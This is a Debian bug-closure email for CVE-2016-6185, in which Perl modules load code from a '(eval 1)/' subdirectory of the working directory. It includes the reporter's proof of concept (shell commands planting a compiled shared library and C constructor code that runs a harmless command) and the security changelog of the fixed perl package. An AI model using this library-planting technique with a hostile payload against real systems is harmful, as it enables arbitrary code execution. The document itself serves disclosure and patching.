Your message dated Tue, 26 Jul 2016 22:17:59 +0000
with message-id <[email protected]>
and subject line Bug#829578: fixed in perl 5.20.2-3+deb8u6
has caused the Debian Bug report #829578,
regarding perl: CVE-2016-6185: XSLoader tries to load code from '(eval 1)/'
when called inside a string eval
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)
--
829578: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=829578
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message ---
Package: liblist-moreutils-perl
Version: 0.413-1+b1
Tags: security
Control: affects -1 + check-all-the-things
List::MoreUtils tries to load code from a subdirectory of the current
working directory. This could lead to execution of arbitrary code if
cwd is untrusted.
Proof of concept:
$ mkdir -p '(eval 1)/auto/List/MoreUtils/'
$ gcc -Wall -fPIC -shared moo.c -o '(eval 1)/auto/List/MoreUtils/MoreUtils.so'
$ perl -e 'no lib "."; use List::MoreUtils'
(__)
(oo)
/------\/
/ | ||
* /\---/\
~~ ~~
..."Have you mooed today?"...
Segmentation fault
-- System Information:
Debian Release: stretch/sid
APT prefers unstable
APT policy: (990, 'unstable'), (500, 'experimental')
Architecture: i386 (x86_64)
Foreign Architectures: amd64
Kernel: Linux 4.6.0-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=C, LC_CTYPE=pl_PL.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: sysvinit (via /sbin/init)
Versions of packages liblist-moreutils-perl depends on:
ii libc6 2.22-13
ii libexporter-tiny-perl 0.042-1
ii perl 5.22.2-1
ii perl-base [perlapi-5.22.1] 5.22.2-1
--
Jakub Wilk
#include <signal.h>
#include <stdlib.h>
void __attribute__((constructor)) moo() {
system("apt-get moo");
kill(0, SIGSEGV);
}
--- End Message ---
--- Begin Message ---
Source: perl
Source-Version: 5.20.2-3+deb8u6
We believe that the bug you reported is fixed in the latest version of
perl, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to [email protected],
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Dominic Hargreaves <[email protected]> (supplier of updated perl package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [email protected])
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Format: 1.8
Date: Fri, 22 Jul 2016 16:30:45 +0100
Source: perl
Binary: perl-base perl-doc perl-debug libperl5.20 libperl-dev perl-modules perl
Architecture: all amd64 source
Version: 5.20.2-3+deb8u6
Distribution: jessie-security
Urgency: high
Maintainer: Niko Tyni <[email protected]>
Changed-By: Dominic Hargreaves <[email protected]>
Closes: 829578
Description:
libperl5.20 - shared Perl library
libperl-dev - Perl library: development files
perl-base - minimal Perl system
perl-debug - debug-enabled Perl interpreter
perl-doc - Perl documentation
perl - Larry Wall's Practical Extraction and Report Language
perl-modules - Core Perl modules
Changes:
perl (5.20.2-3+deb8u6) jessie-security; urgency=high
.
[ Niko Tyni ]
* [SECURITY] CVE-2016-1238: opportunistic loading of optional
modules can make many programs unintentionally load code
from the current working directory (which might be changed to
another directory without the user realising).
+ allow user configurable removal of "." from @INC in
/etc/perl/sitecustomize.pl for a transitional period. (See: #588017)
+ backport patches from [perl #127834] to fix known vulnerabilities
even if the user does not configure "." to be removed from @INC
+ backport patches from [perl #127810] to fix various classes of
build failures in perl and CPAN modules if "." is removed from
@INC
.
[ Dominic Hargreaves ]
* [SECURITY] CVE-2016-6185: Make XSLoader skip relative paths not
on @INC. (Closes: #829578)
Checksums-Sha1:
0a2b60f4c782b530c71bee2f02924ebc29bcbd7b 2322 perl_5.20.2-3+deb8u6.dsc
9c18e568d3de10f3f89d9ec5466da915bc27b881 147848
perl_5.20.2-3+deb8u6.debian.tar.xz
8a848495a26bbceb3f6ed8d8742a1f90da5deeee 7348008
perl-doc_5.20.2-3+deb8u6_all.deb
b08ba3dd6c6643cfbde1871ca2e6d42314ac8df5 2546644
perl-modules_5.20.2-3+deb8u6_all.deb
f28a7ea3b34a85f4619fe12ea789022ece23b223 1229140
perl-base_5.20.2-3+deb8u6_amd64.deb
e5eb387b9fb8cee01016d193fd6f23c436767a92 4626424
perl-debug_5.20.2-3+deb8u6_amd64.deb
deec309405c9e74f2123ec3816213da064d84a76 1350
libperl5.20_5.20.2-3+deb8u6_amd64.deb
eb5dbf55cea999f5d1a79d51eadaf1da8c2da162 2142886
libperl-dev_5.20.2-3+deb8u6_amd64.deb
bf6d261602ca406173ac2937a2391dda8b05ce2a 2637484 perl_5.20.2-3+deb8u6_amd64.deb
Checksums-Sha256:
b7569ffa209fcd84bc4d487a9c242b21b0db591b3a9222ae0e1140bab67c6106 2322
perl_5.20.2-3+deb8u6.dsc
f6d31a96ea22b2f2626bb017c4960bcbdf1ac1e11e5639175cd9418fdccda812 147848
perl_5.20.2-3+deb8u6.debian.tar.xz
b8f4c715a5907a358f08aee51a06018aaf42f11ea3b437bd1412612f7949c77a 7348008
perl-doc_5.20.2-3+deb8u6_all.deb
59c74e72dc08a7d13245cceee1b4877238503b2e24ef05209dd4ce34256d034c 2546644
perl-modules_5.20.2-3+deb8u6_all.deb
d4957a3ccb9c311c6a24df2f45652b3a72e854daa79cb8675e9d501389ba11e0 1229140
perl-base_5.20.2-3+deb8u6_amd64.deb
05fa0120797b82071d2279c6d8294ec717f0501c2ff0dfb3e0edf0b25170b0a5 4626424
perl-debug_5.20.2-3+deb8u6_amd64.deb
7cc76407a0721747d678d2e4dac0fc71265f075963f564ef2f0a6f8fa3593fd9 1350
libperl5.20_5.20.2-3+deb8u6_amd64.deb
2265125af5c118fec0698901fcec5047d0221ddcee77a761bdfebe074002a0d9 2142886
libperl-dev_5.20.2-3+deb8u6_amd64.deb
c8e863928022d4723a40177958b0d1e236540b2ae540bf17f534124fc45f8b43 2637484
perl_5.20.2-3+deb8u6_amd64.deb
Files:
7cfb7884b007e91d5294d801430a9742 2322 perl standard perl_5.20.2-3+deb8u6.dsc
53e57cdf702ba031189ce7f7860a52d5 147848 perl standard
perl_5.20.2-3+deb8u6.debian.tar.xz
c4f73d1bcc256c233938c683915dcb62 7348008 doc optional
perl-doc_5.20.2-3+deb8u6_all.deb
0d9a0dd06969ab4d8b68d49d598c9ec4 2546644 perl standard
perl-modules_5.20.2-3+deb8u6_all.deb
a58ac685ce7ffbe27ca04d8345306654 1229140 perl required
perl-base_5.20.2-3+deb8u6_amd64.deb
fa34a25a7b1d73c31933743af444947b 4626424 debug extra
perl-debug_5.20.2-3+deb8u6_amd64.deb
91876213de552333aa5748d0482a1921 1350 libs optional
libperl5.20_5.20.2-3+deb8u6_amd64.deb
60447eca2a85350c34509ce8e29bb6e2 2142886 libdevel optional
libperl-dev_5.20.2-3+deb8u6_amd64.deb
ba01fdc0c63fbde6e0f45a6961515a05 2637484 perl standard
perl_5.20.2-3+deb8u6_amd64.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIcBAEBAgAGBQJXkk0GAAoJEMAFfnFNaU+ytxMP/1D5DiyfGiIK/jta0uL6POH1
ybg2FzEFYQkFEAvQ5f+gpG5mvvBRa1eOMF44WZaQaSj2/xsDnB8B3Ql9X6/RpPzn
+5s8AKc4qXqRxSiRfOubswXNXtZ1EJFxESM1UAX4W9AITDGYCmtDjaZWcP2bDyS6
zTkXR47sfQkKNnpueMaKQfIKEKIvY31s7HrXoDh65+Cq7/zjUsPxd1nL18VQhV07
VDjLlC8slJyswCgIvTqHean4Cbu5VEvvsN0R3nI4pOoWcFzi0ANUCatjw6jregE/
3YOxsrc40hRQQKUHGLJaVQpum2Lq9wWG9/6ZUdsYYUsczj1WFgboMKmBkFZYLTwt
geJxnLjbgV/uY6NeoWRoqH8C2gvF0P/N8ccoGwEvBeskSo8dNm3FkZKDdw6XX/aH
85Pcuo+knn7jVreeDzol2/otEHJ34M32YW8Ct3vapclVdcPRe4FVTmIdWt7u6w72
tMkG2R9ww+FmJlZaQaW9uDR7Pf9kWLWxNVLkRU4BWo5sTTiOUjxOzUZ1ddb9GYLA
fsYtgmaehTr3Xqzs20uk4q9IxCbuLfkClXG8HNTDMZhJSYaJgy0Wiq8vAeFInDPL
srFrZVu1AT6/YmeJQnUYg+2+yjFacZcDdJwvI2s8ACWm+VwM0YDYjlBDVD5jq+0c
UhjcX/EDXFwFU6Fle24e
=k6c+
-----END PGP SIGNATURE-----
--- End Message ---
